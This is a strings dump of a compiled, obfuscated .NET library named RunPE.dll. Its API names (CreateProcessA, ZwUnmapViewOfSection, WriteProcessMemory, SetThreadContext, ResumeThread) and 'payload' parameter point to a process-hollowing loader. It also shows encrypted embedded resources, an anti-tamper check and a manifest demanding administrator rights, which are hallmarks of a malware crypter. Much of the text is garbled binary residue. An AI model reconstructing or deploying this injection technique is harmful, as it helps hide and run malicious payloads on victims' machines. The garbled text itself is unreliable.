!This program cannot be run in DOS mode.
`.rsrc
@.reloc
bDX I+
(yYv4(S
(As,0(S
('1a8(S
Z ?_d
_b`*
}Q&Hj
UUUU_
(ZjX
}Q&Hj
UUUU_
(jXET(S
v4.0.30319
#Strings
String
System
mscorlib
TargetFrameworkAttribute
System.Runtime.Versioning
AssemblyTitleAttribute
System.Reflection
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
Boolean
AssemblyFileVersionAttribute
DebuggableAttribute
System.Diagnostics
DebuggingModes
CompilationRelaxationsAttribute
System.Runtime.CompilerServices
RuntimeCompatibilityAttribute
SuppressIldasmAttribute
74d5882f-8154-4ed8-b2d4-88335a1ca552
RunPE.dll
<Module>
iNTEJIjtnwijiqjiw
iqbihiqhwniiq
Object
DelegateResumeThread
MulticastDelegate
DelegateWow64SetThreadContext
DelegateSetThreadContext
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateVirtualAllocEx
DelegateWriteProcessMemory
DelegateReadProcessMemory
DelegateZwUnmapViewOfSection
DelegateCreateProcessA
ProcessInformation
ValueType
StartupInformation
<Module>{BA54FACC-8C3B-4A5F-BB6D-8850954AF0CA}
wqUkRo9EscVExha5Yb
g7g5PGRdwFuQFU69Xt
SFU4mbT3GMret7THonf
nLvrU8AQJDKRRZAB7e
lCDAsW5mfE1qB1o2W5
TcgtlTJMqndCQM8LE9
FJKLljVXn5i8Q7GvId
Attribute
AdB8GujvggcnCBBXyu`1
UrPGe6xslrAsBK6GjP
i1uYS1ZgJb61OZYA9J
R7YAWCr4xoMEwZIN1q
i5n5dgPY1M9nRIix0B
V6b0g4fO38opQb8IQD
GuoMSJc49jmZx0C6wm
d6CqZQhEiQTdS0lVdU
MmMppQbpPNjXnJuAp3
fFxTtKHrwlv9upVou0
oNUUeJp4QJ2hQxwKZF
G53N3ivQR5mlTdjgs9
rV9N3WuhF41qaV0GPT
iehh7boeaNq3xAaFC6
JOoSTcUQYrhd3hbI7F
BUG8FizHLVExd75sFp
RAE4tXKNwCuTsTUgD7S
<PrivateImplementationDetails>{810CB62D-83C0-4D54-84C5-04B0A565A176}
__StaticArrayInitTypeSize=256
__StaticArrayInitTypeSize=40
__StaticArrayInitTypeSize=30
__StaticArrayInitTypeSize=32
__StaticArrayInitTypeSize=16
__StaticArrayInitTypeSize=64
__StaticArrayInitTypeSize=18
rwe64q
ml4771
Lvvgaj
bsun4l
.cctor
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
LoadLibraryA
IntPtr
kernel32
GetProcAddress
hProcess
LoadApi
CreateApi
method
zqwhehuqbuhwubhuqq
payload
Exception
object
Invoke
handle
BeginInvoke
IAsyncResult
AsyncCallback
callback
EndInvoke
result
thread
context
address
length
protect
process
baseAddress
buffer
bufferSize
bytesWritten
bytesRead
applicationName
commandLine
processAttributes
threadAttributes
inheritHandles
UInt32
creationFlags
environment
currentDirectory
startupInfo
processInformation
ProcessHandle
ThreadHandle
ProcessId
ThreadId
Reserved1
Desktop
Reserved2
StdInput
StdOutput
StdError
MWc8XleLVV
Module
typemdt
FieldInfo
MethodInfo
SK70TJ5gw5
qRV0FxcZLN
j1e0OaPnrN
X2f0nwJcF0
okx02TCOKN
Q1q0XYRGZR
Wmr0YWOKFe
Assembly
A8L0DbZnyI
hOH09yMFa4
Xyi010l0nD
Dictionary`2
System.Collections.Generic
gll0AmYYTa
a8t0IqV0dv
WMc0ahe99r
Ae50CFZEG1
nhy03XOrNY
Q4Y0MHpbsx
UpK0j1KXn3
UR60tcdG3v
List`1
TkY0GRXcuB
SortedList
System.Collections
QFa0scKQwx
iWG0xspcVI
PmP0WYlgta
EbV0QyH2XJ
IPq0EAgE31
Fsl0RG6qjV
EVm0kV0JEU
RSACryptoServiceProvider
System.Security.Cryptography
AyM0BuQvCD
mnf0iy2Xdp
yVD0lbAY8S
BIw0qwmofm
firstrundone
EHY07C8Nkx
f3x05URidx
CfF0Vu1jc2
xJD0JFICoe
lfm06y1W4b
Nll0SVdCxp
Hashtable
cF70garKgs
vH40en9ELL
VYO0m6PX3e
GetTypeFromHandle
RuntimeTypeHandle
get_Assembly
RuntimeHelpers
InitializeArray
RuntimeFieldHandle
Encoding
System.Text
get_Unicode
GetString
set_UseMachineKeyStore
c2w8BDWoyW
UInt64
BitConverter
GetBytes
Y0Q8ln2q0R
UInt16
c2J8tvIe72
JLq8qRNF6r
YRf8T10hUc
lQs86Wlt1X
qa58FrQ8SE
MFr8OaChF8
MAr8D8cKed
SymmetricAlgorithm
AesCryptoServiceProvider
System.Core
RijndaelManaged
Activator
CreateInstance
ObjectHandle
System.Runtime.Remoting
Unwrap
ybg8eXHvp2
CryptoConfig
get_AllowOnlyFipsAlgorithms
cYe8gg3jlQ
MD5CryptoServiceProvider
HashAlgorithm
ComputeHash
Y3C8Gc9uFD
Stream
System.IO
pHT8IorQS4
TransformBlock
T9b8EroXph
BinaryReader
get_BaseStream
set_Position
ReadUInt32
EtU8Qi9mp8
ICryptoTransform
FileStream
CryptoStream
FileMode
FileAccess
FileShare
CryptoStreamMode
HPY8MnHhVf
ParameterInfo
DynamicMethod
System.Reflection.Emit
ILGenerator
Monitor
System.Threading
GetManifestResourceStream
get_Length
ReadBytes
MemoryStream
GetFields
BindingFlags
MemberInfo
get_MetadataToken
get_Item
get_Module
GetGenericArguments
ResolveMethod
MethodBase
get_IsStatic
get_FieldType
Delegate
CreateDelegate
SetValue
GetParameters
get_DeclaringType
get_IsValueType
MakeByRefType
get_ParameterType
get_ReturnType
GetILGenerator
OpCode
OpCodes
Ldarg_0
Ldarg_1
Ldarg_2
Ldarg_3
Ldarg_S
Tailcall
Callvirt
Ed787wFsyX
txt8nMX1dF
tD58CArDL3
VSb8aYHvXo
StackFrame
GetMethod
op_Inequality
ToInt32
get_Count
oJP8SRFkee
Convert
FromBase64String
gT889kxuZB
GUT8RQKnyc
SQy8AQlmOf
Marshal
aET8JBjdn5
get_Location
Exists
GetName
AssemblyName
get_CodeBase
ToString
Replace
GetType
GetProperty
PropertyInfo
GetValue
PY08V2MERI
LoadLibrary
Lui8jqVp0r
Fof8xr9GjE
Concat
GetDelegateForFunctionPointer
G1p8ZVMsXB
D7t8rnBNGh
eXC8PKN5Gw
A5A8fiNlIF
U9R8cmk1lf
PLs0L7jWH3
op_Equality
r6X8h4DBtT
IDisposable
Dispose
i048b1FIg7
W2B8HQ8LZb
ToArray
pLv8pJsxuO
set_Key
set_IV
CreateDecryptor
Ynv8vglvZw
get_OffsetToStringData
bJA8uTcIxU
StartsWith
get_Chars
J5D8owahTN
KQ28UaQygI
UWp8zQVQVu
Wv90NW8pBM
Uqo0Ks79er
xFM04hI2Ep
Xp30wWqNfl
XXy0yB1QBl
Wpx08bvT4i
gKp000g6Bc
qqPJFgtMWZ0VTDqKHI
TH6NuMRg4YthsefUbB
WIHM5PxIr9Q0ugtwAG
vvko1GoCfG8UMjoZRt
bc0vwgnQWINhMNe7aU
LF7UUsWcFo0s58IW9S
Reverse
MRiCEOfWWVWqqBKRER
gm3oLWVWrccbgy2OTr
GetPublicKeyToken
Y7fBDbbItfZ6yB6FD9
PVXCk7AbIKOyYuBdSc
CipherMode
set_Mode
RXPsAlYlgJxfqtxyHh
bolctLmBUYUoZ5lasq
EHeIwLPmnNgsScpkgI
QF8wEfavNvoEGvMOpP
FlushFinalBlock
rkGj7jgKdBbZ7cq3Zq
wu3AyxlmBdAWrtQmjK
J4Hwqfe7E7OmgkyWoG
vZFSUhTLO6p5Ehgkx1
IethEHXW9EnMwCTZitc
mCDZ6OXfoRAy1wqrrFg
GpTr7EXVVfBJTgt1VGS
goRUBGXbqPiPsSIGnHc
JmWcHfXARmVJx5WCG6Y
gHB7fNXYotC8rhMEjsZ
Create
UnOy4yXmwTHjyr8QCpy
MapNameToOID
Frd3YaXPPeS9eT87eSF
a9513VXaGmeIr7ylmf9
BakT6TXgacpbiqDIgCt
a7VMaEXloFbeI1v4P6h
DJKjnvXH38KH6VekJNk
JNMb3UXvKH5OsICo7xs
jF3gByXEWFJglZYk7nL
rWppIoXGwvRg2G72hmq
zOFOqRX53UowNll6wjG
tOJ40lXwcAuXbo8qDD8
rcZnAvXIBKDwcigX6wC
Do5vIAXhhMjXEu6cBUY
MEdNKUXuomrv685LAgI
get_UTF8
A7uFVlXOUfQbxuDbWFC
JZCUTdXDPwQBuB389Cb
XP6SJFX8xjrgxJpZO02
AsymmetricAlgorithm
FromXmlString
u8gxNwXLKk2MDbDEK2x
QC8iIoXSggrKSK46JIU
tvEp51XqNbNKj4F8WXj
BBIKZ9X1eePpADsUPRQ
ReadUInt16
YtMIoIXJAKKjHj4IXwN
EWLCtGXdCQt3jw2s2R8
ogv4gjXy0fmwJYhUHZo
get_Position
BBacQaXphsvvYWYkRDG
vjqit7X3K94yJokDh4a
uRak5MX0h2R2T5W7TQo
hVy6T2XiNs8nbTBWeYR
TransformFinalBlock
GrUhn3XKAIUy5J5iPLV
gfnmjvXBP1DdIHnja46
r1RnO8Xksj0h2J5j54Z
get_Hash
eBX9JbXQV2HCyNulRur
VerifyHash
be391XXNh2nKt4NfYqH
e06xbBX9WhbHn6TNrSd
NltV9sXcLD8YoKrBT0J
get_Name
i52g7WXzHhqBZkpcENE
wPPsvGXosAfJdAIKJb8
evpGJrXnN9yBxd2ThDV
SLG0ZmRW7r
CreateEncryptor
ToBase64String
classthis
nativeEntry
nativeSizeOfCode
pxu0rqyqZr
nKT0PtGOb0
QSa0v9FXky
NJK0HP6bbE
H9R0frEDDF
COr0cVo5U2
i7n0hT6Ml9
ReadInt32
rJy0bsBSOH
hModule
lpName
lpType
lpAddress
dwSize
flAllocationType
flProtect
lpBaseAddress
lpNumberOfBytesWritten
flNewProtect
lpflOldProtect
dwDesiredAccess
bInheritHandle
dwProcessId
value__
c1L0ui0mSw
OCT0oOFNfT
ModuleHandle
GetRuntimeTypeHandleFromMetadataToken
GetRuntimeFieldHandleFromMetadataToken
GetModules
get_ModuleHandle
$$method0x600031a-1
$$method0x600031a-2
$$method0x6000338-1
$$method0x6000338-2
$$method0x6000346-1
$$method0x6000346-2
$$method0x600035a-1
$$method0x600039c-1
$$method0x60005c0-1
px0xud
Process
SizeOf
ToUInt32
get_Size
ToInt16
Buffer
BlockCopy
GetProcessById
ResolveType
get_ManifestModule
UnmanagedFunctionPointerAttribute
CallingConvention
CharSet
FlagsAttribute
CompilerGeneratedAttribute
vvehsnu
RunPE.g.resources
f1tvwoy.
aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
1.0.0.0
WrapNonExceptionThrows
lCDAsW5mfE1qB1o2W5.nLvrU8AQJDKRRZAB7e+FJKLljVXn5i8Q7GvId+AdB8GujvggcnCBBXyu`1[[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]][]
SUsSystem.Runtime.InteropServices.CharSet, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
CharSet
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
K^ AEZ;j.
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ajSystem.CodeDom.MemberAttributes, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089mSystem.Globalization.CultureInfo, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089fSystem.Drawing.Size, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
System.CodeDom.MemberAttributes
value__
System.Globalization.CultureInfo
m_isReadOnly
compareInfo
textInfo
numInfo
dateTimeInfo
calendar
m_dataItem
cultureID
m_name
m_useUserOverride
System.Globalization.CompareInfo
System.Globalization.TextInfo%System.Globalization.NumberFormatInfo'System.Globalization.DateTimeFormatInfo&System.Globalization.GregorianCalendar
System.Globalization.CompareInfo
m_name
win32LCID
culture
m_SortVersion
System.Globalization.SortVersion
System.Globalization.TextInfo
m_listSeparator
m_isReadOnly
m_cultureName
customCultureName
m_nDataItem
m_useUserOverride
m_win32LangID
%System.Globalization.NumberFormatInfo"
numberGroupSizes
currencyGroupSizes
percentGroupSizes
positiveSign
negativeSign
numberDecimalSeparator
numberGroupSeparator
currencyGroupSeparator
currencyDecimalSeparator
currencySymbol
ansiCurrencySymbol
nanSymbol
positiveInfinitySymbol
negativeInfinitySymbol
percentDecimalSeparator
percentGroupSeparator
percentSymbol
perMilleSymbol
nativeDigits
m_dataItem
numberDecimalDigits
currencyDecimalDigits
currencyPositivePattern
currencyNegativePattern
numberNegativePattern
percentPositivePattern
percentNegativePattern
percentDecimalDigits
digitSubstitution
isReadOnly
m_useUserOverride
m_isInvariant
validForParseAsNumber
validForParseAsCurrency
Infinity
-Infinity
'System.Globalization.DateTimeFormatInfo+
m_name
amDesignator
pmDesignator
dateSeparator
generalShortTimePattern
generalLongTimePattern
timeSeparator
monthDayPattern
dateTimeOffsetPattern
calendar
firstDayOfWeek
calendarWeekRule
fullDateTimePattern
abbreviatedDayNames
m_superShortDayNames
dayNames
abbreviatedMonthNames
monthNames
genitiveMonthNames m_genitiveAbbreviatedMonthNames
leapYearMonthNames
longDatePattern
shortDatePattern
yearMonthPattern
longTimePattern
shortTimePattern
allYearMonthPatterns
allShortDatePatterns
allLongDatePatterns
allShortTimePatterns
allLongTimePatterns
m_eraNames
m_abbrevEraNames
m_abbrevEnglishEraNames
optionalCalendars
m_isReadOnly
formatFlags
CultureID
m_useUserOverride
bUseCalendarInfo
nDataItem
m_isDefaultCalendar
m_dateWords
&System.Globalization.GregorianCalendar
(System.Globalization.DateTimeFormatFlags
dddd, dd MMMM yyyy
MM/dd/yyyy
yyyy MMMM
HH:mm:ss
(System.Globalization.DateTimeFormatFlags
value__
&System.Globalization.GregorianCalendar
m_type
m_currentEraValue
twoDigitYearMax
Calendar+m_currentEraValue
Calendar+m_isReadOnly
Calendar+twoDigitYearMax
+System.Globalization.GregorianCalendarTypes
+System.Globalization.GregorianCalendarTypes
value__
yyyy-MM-dd
hh:mm tt
h:mm tt
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Size
height
uTy,%X[
Rfhn M
RunPE.pdb
_CorDllMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="RunPE"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
QR!QR)QR1QR9QRAQRIQRQQRYQ]iQRqQx
.Sb.KW.CW.[o.s
.#W.;W.3W.+W
%$&$'$($)$*$+$
System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
System.Security.Cryptography.AesCryptoServiceProvider
is tampered.
f1tvwoy.
{11111-22222-10009-11112}
vvehsnu
{11111-22222-50001-00000}
GetDelegateForFunctionPointer
file:///
Location
ResourceA
Virtual
Write
Process
Memory
Protect
Process
Close
Handle
kernel
32.dll
{11111-22222-30001-00001}
{11111-22222-30001-00002}
{11111-22222-40001-00001}
{11111-22222-40001-00002}
{11111-22222-50001-00001}
{11111-22222-50001-00002}
$this.SnapToGrid
$this.TrayLargeIcon
$this.Icon
$this.Locked
$this.DrawGrid
progressBar1.Modifiers
$this.Localizable
$this.Language
$this.GridSize
$this.TrayHeight
progressBar1.Locked
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
RunPE.dll
LegalCopyright
OriginalFilename
RunPE.dll
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0